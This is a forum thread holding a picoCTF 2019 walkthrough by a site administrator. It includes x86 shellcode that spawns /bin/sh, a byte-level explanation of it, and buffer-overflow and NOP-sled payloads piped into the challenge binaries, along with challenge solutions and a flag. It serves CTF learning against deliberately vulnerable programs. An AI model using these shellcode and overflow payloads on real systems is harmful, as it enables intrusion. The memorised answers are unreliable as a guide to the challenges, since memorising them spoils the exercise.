Video Tutorial picoCTF Walkthrough Writeup 2019

Hexui Undetected CSGO Cheats PUBG Accounts

Rake

I'm not your friend
Administrator
Jan 21, 2014
13,306
79,068
2,484
In this Linux Noob picoCTF 2019 Tutorial you will learn about buffer overflows and a lot more hacking techniques.

CTF’s are a key and fundamental way to learn about the world of hacking. This picoCTF guide will walk you through and teach you the fundamentals of how to hack. Penetration testing skills can be hones and advanced using a CTF guide and in this beginner CTF we will cover the infamous Buffer Overflow.

In the Cyber Security world a buffer overflow is a when a piece of code written by a programmer has incorrectly allocated or programmed excess data while writing to a buffer. Buffers are areas of memory set to hold data and in this picoCTF guide you will learn how to use programmers poorly written code to your advantage. Buffer Overflows have been used by elite hackers such as nation states, and black hat hackers all around the world since hacking began. These techniques have brought down governments and some of the biggest companies in the world. Learning these techniques will put you ahead of skid kiddies who do not apply themselves to a CTF tutorial and only look for the easy way.

In this picoCTF tutorial you will cover and learn concepts such as:

. How to program shell code in C
. How to use advanced system hacking techniques link elite nation state hackers
. Fundamental penetration testing skills

Once you’ve completed this beginners guide to CTF you will have a better understand of how a computer systems memory works and how writing improper code can cause a serious breach of a system. Guided Hacking hopes you enjoy this picoCTF tutorial and on completion of our picoCTF guide you can take your new found knowledge of a buffer overflow and go on to create even more advanced hacking techniques in computer memory.

What is picoCTF?
picoCTF is a free computer security game targeted at middle and high school students, created by security experts at Carnegie Mellon University. The game consists of a series of challenges centered around a unique storyline where participants must reverse engineer, break, hack, decrypt, or do whatever it takes to solve the challenge. The challenges are all set up with the intent of being hacked, making it an excellent, legal way to get hands-on experience.

The 2019 competition was held between September 27, 2019 and October 11, 2019. Though the competition has ended this year, anyone 13 and older can play picoCTF 2019 or picoCTF 2018 year-round for fun and learning.

picoCTF - CMU Cybersecurity Competition

Wow this CTF was much bigger and harder than I initially thought, this was gonna be a 2 part video and now it's 5 parts.

picoCTF Walkthrough Writeup 2019


Video 2 Challenges:
  • open to admins
  • tapping
  • la cifra de
  • picobrowser
  • plumbing
  • slippery-shellcode
  • vault door 3
  • what's the difference
  • where is the file
In this picoCTF 2019 Writeup 2/3 Buffer Overflows tutorial you will learn the key and fundamental concepts of what it takes to engineer a buffer overflow attack on a linux machine.

Using Windows Subsystem fo Linux(WSL) This picoCTF will help you develop the understanding and know-how in one of the cyber security industries most well known attack methods. This attack method has method has been used by some of the most elite hackers in the world such as, nation state hackers, black hat hackers, and penetration testing security professionals. This beginner CTF is a great way to get yourself accustomed with WSL. Windows Subsystem for Linux is a layer within a Windows operating system that has compatibility with a Linux operating system.

During this picoCTF guide you will learn about key concepts of a Linux operating system computer and computer architecture that will give you a better and more refined understanding of how the low level aspect of a computer system works. This picoCTF tutorial is a great way for beginner CTF users to learn about how a buffer overflow works.

In this picoCTF guide you learn the following concepts:

. How a buffer overflow is written
. How poor code can be used to hack an operating system
. Windows Subsystem for Linux
. Computer architecture of a buffer overflow
. Elite and advanced penetration testing methods

After finishing this picoCTF tutorial you will have developed the key and fundamental knowledge about how to hack and be on your way to becoming a capture the flag master. All the knowledge provided in this picoCTF guide is used daily by elite hackers and doing a picoCTF walkthrough is a great way to develop and hone those penetration testing skills quickly. Guided Hacking hopes you enjoy tis picoCTF tutorial and with the skills learned from our picoCTF walkthrough you can go on to develop even more advanced attack methods on your journey to becoming an elite hacker.


How to SSH into picoctf 2019:
ssh username@2019shell1.picoctf.com

Here's some useful links I used
Online x86 and x64 Intel Instruction Assembler
X86 Assembly/Interfacing with Linux - Wikibooks, open books for an open world
execve(2): execute program - Linux man page
ASCII to Hex - Free text conversion tools
PUSH — Push Word, Doubleword or Quadword Onto the Stack
Online Hex Converter - Bytes, Ints, Floats, Significance, Endians - SCADACore
Steganography Online
Convert octal to text - Converters
jsm28/bsd-games
RSA (cryptosystem) - Wikipedia

Here's a few solutions from the videos that you want

Handy shellcode

Code:
push  0x0068732f
push  0x6e69622f
mov ebx, esp
mov ecx, 0
mov edx, 0
mov eax, 0xb
int 0x80

(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln
OverFlow 1
Code:
(echo -en "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\xe6\x85\x04\x08"; cat) | ./vuln
Slippery Shellcode
Code:
(echo -en "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln
what's the difference
C++:
#include <iostream>
#include <fstream>
#include <vector>

int main()
{
    std::ifstream fs1("cattos.jpg", std::ios::in | std::ios::binary);
    std::ifstream fs2("kitters.jpg", std::ios::in | std::ios::binary);

    std::vector<char> fsa((std::istreambuf_iterator<char>(fs1)), std::istreambuf_iterator<char>());
    std::vector<char> fsb((std::istreambuf_iterator<char>(fs2)), std::istreambuf_iterator<char>());

    for (int i = 0; i < fsa.size(); i++)
    {
        if (fsa[i] != fsb[i])
        {
            std::cout << fsa[i];
        }
    }
    return 0;
}
vault door 3
C++:
#include <iostream>

const char hash[] = "jU5t_a_sna_3lpm13gc49_u_4_m0rf41";

char password[32]{ 0 };

void Decode(const char* input, char* output)
{
    for (int i = 31; i >=17 ; i-=2)
    {
        output[i] = input[i];
    }

    for (int i = 0; i < 32; i+=2)
    {
        output[i] = input[46-i];
    }
      
    for (int i= 0; i < 16; i++)
    {
        output[i] = input[23-i];
    }

    for (int i = 0; i < 8; i++)
    {
        output[i] = input[i];
    }
}

int main()
{
    Decode(hash, password);

    std::cout << password << std::endl;

    return 0;
}
 
Last edited:

mambda

headass
Escobar Tier VIP
Trump Tier Donator
Jun 25, 2014
2,320
37,938
271
its a nice idea, we've tried it before, people dont participate
 

Meanjellybean

Trump Tier Donator
Dank Tier Donator
Sep 21, 2019
18
598
0
Well i would be willing to give it a try. Put some of my Ipa pro skills and cpp codes to use.
👍
This year is over. But maybe 2020?
 

Rake

I'm not your friend
Administrator
Jan 21, 2014
13,306
79,068
2,484
I created a team, PM for password if you're kewl, can only have 5 peeps on the team I guess
 

Rake

I'm not your friend
Administrator
Jan 21, 2014
13,306
79,068
2,484
Random video notes

/problems/handy-shellcode_5_d1b3658f284f442eac06607b8ac4d1f5
so the easiest way to do this is to spawn a shell that has permissions to open the file

We want to execute a system call which calls sys_execve

The easiest way to do that is by calling the execve Linux syscall and having it execute /bin/sh/
The assembly code to do this looks like this:
https://defuse.ca/online-x86-assembler.htm#disassembly
push 0x0068732f
push 0x6e69622f
mov ebx, esp
mov ecx, 0
mov edx, 0
mov eax, 0xb
int 0x80

"\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\"

We will break it down one line at a time

/bin/sh

int 0x80 is the syscall interupt

call execve
which syscall number is execve:
get the syscall number

https://syscalls.kernelgrok.com/
0xB or 11

int execve(const char *filename, char *const argv[], char *const envp[]);
so there are 3 arguments, the first one is path of the file we want to execute, the second 2 don't matter for our needs, we don't need shell arguments or environment variables set

So we need to write some assembly that calls the execve syscall, which will execute /bin/sh. We need to know the calling convention for syscalls

SysCall# Param 1 Param 2 Param 3 Param 4 Param 5 Param 6
eax ebx ecx edx esi edi ebp

Return value
eax

Our function only has 3 parameters, and the second 2 are optional so we will just set them to 0.

The first argument needs to be a pointer to the /bin/sh string, the easiest thing to do is make this string a local variable on the stack

https://www.felixcloutier.com/x86/push
We want to push an immediate 32 bit value which is op code 68
The push instruction is a 5 byte instruction, 1 byte is the opcode and the other 4 are the bytes we're pushing

So first we the push the "/bin/sh" string
The string we need is "/bin/sh" with a null terminator

this string in hex is 2f 62 69 6e 2f 73 68 00, this is 8 bytes including the null terminator so we can do it with 2 pushes.

this has to be done in reverse (this includes the null terminator)

push 0x68732f00 = 68 2F736800
push 0x6e69622f = 68 2F62696E

The first parameter of the syscall goes into EBX, so we want a pointer to our string to be in there, so we simply move the stack pointer there, because it points to the last var on the stack
mov ebx, esp = 8B DC

the next 2 arguments we said would be null, so we mov 0 into ecx and edx

mov ecx, 0 = B9 00000000
mov edx, 0 = BA 00000000

then we need to move the syscall number into eax
mov eax, b = B8 0B000000

now to execute the syscall we use interupt 0x80
int 0x80 = CD 80

but just this alone will cause a segmentation fault

we need to call sysexit to prevent this, so we do a syscall using 1 which is the # for sys_exit
mov eax, 1 = B8 01000000
int 80 = CD 80

All these instructions combined looks like this;
push 0x0068732f
push 0x6e69622f
mov ebx, esp
mov ecx, 0
mov edx, 0
mov eax, 0xb
int 0x80

So if you take all these bytes and combine into a string literal you get, the \x tells it to interpret each byte as a hex literal

"\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"

You'll see I added a \n
thank you @HACKEDHACKER
The reason we need the \n new line char is because puts() is waiting for you to finish inputting. If you don't put the /n the code still works, you just have to hit enter for it to continue executing.

./vuln

"\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"

or:
PERFECT
(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln

OverFlow 1
64 chars
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
gdb ./vuln

(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln

were jumping to 0x8048705 !

gdb vuln

p flag
0x80485e6 = this if the address of the function we want to call
we want to change the return address to this address by overflowing the buffer

b vuln
Breakpoint 1 at 0x8048663

b flag
Breakpoint 2 at 0x80485ea (now we know what address we want to execute)

b get_return_address
0x8048714
then run

look at it in IDA, more accurate addresses
74
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

75 overwrites the first byte, with a 0 which is a null terminator
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

76 overwrites only 1 byte which is the null terminator
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

77 null terminator + 1 'a' byte 'a' = 0x61
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

78 null terminator plus 2 'a' bytes
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

79 null terminator plus 3 'a' bytes
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

80 null term plus 4 'a' bytes
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

so now we have overwritten the full return address, which is 4 bytes. so now we remove our last 4 bytes and replace it with the return address we want
flag() = 0x080485E6

Little Endian
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaE6 85 04 08

picoCTF{(35.028309, 135.753082)(46.469391, 30.740883)(39.758949, -84.191605)(41.015137, 28.979530)(24.466667, 54.366669)(3.140853, 101.693207)_(9.005401, 38.763611)(-3.989038, -79.203560)(52.377956, 4.897070)(41.085651, -73.858467)(57.790001, -152.407227)(31.205753, 29.924526)}

kyoto japan
odessa ukraine
dayton ohio USA
istanbul turkey
Abu Dhabi, UAE
Kuala Lumpur Malaysia
Addis Abada, Ethipoia
Loja Ecuador
amsterdam netherlands
Sleepy Hollow new york USA
kodiak alasaka, USA
Alexadria Egypt

slippershellcode

original:
(echo -en "\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln

#define BUFSIZE 512
#define FLAGSIZE 128

the buffer is 512 bytes so lets put our shellcode at the end, our shellcode is 17 bytes so lets write 454 bytes and then our shellcode
So if the address that gets called is anywhere in the buffer before our shellcode, it'll just hit nops until it executes the shellcode

new

(echo -en "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x68\x2F\x73\x68\x00\x68\x2F\x62\x69\x6E\x89\xE3\xB9\x00\x00\x00\x00\xBA\x00\x00\x00\x00\xB8\x0B\x00\x00\x00\xCD\x80\n"; cat) | ./vuln
 
Last edited:

Rake

I'm not your friend
Administrator
Jan 21, 2014
13,306
79,068
2,484
Wow this got much harder in the second half, I'm having fun but some of these challenges are making me lose my mind
 
Last edited:
  • Like
Reactions: Mari

Rake

I'm not your friend
Administrator
Jan 21, 2014
13,306
79,068
2,484
video 3 premiering soon

This is out last CTF video, I will not be making anymore. They are the worst performing videos I have ever published and therefore a complete waste of time.
 
Last edited:

Similar threads

Community Mods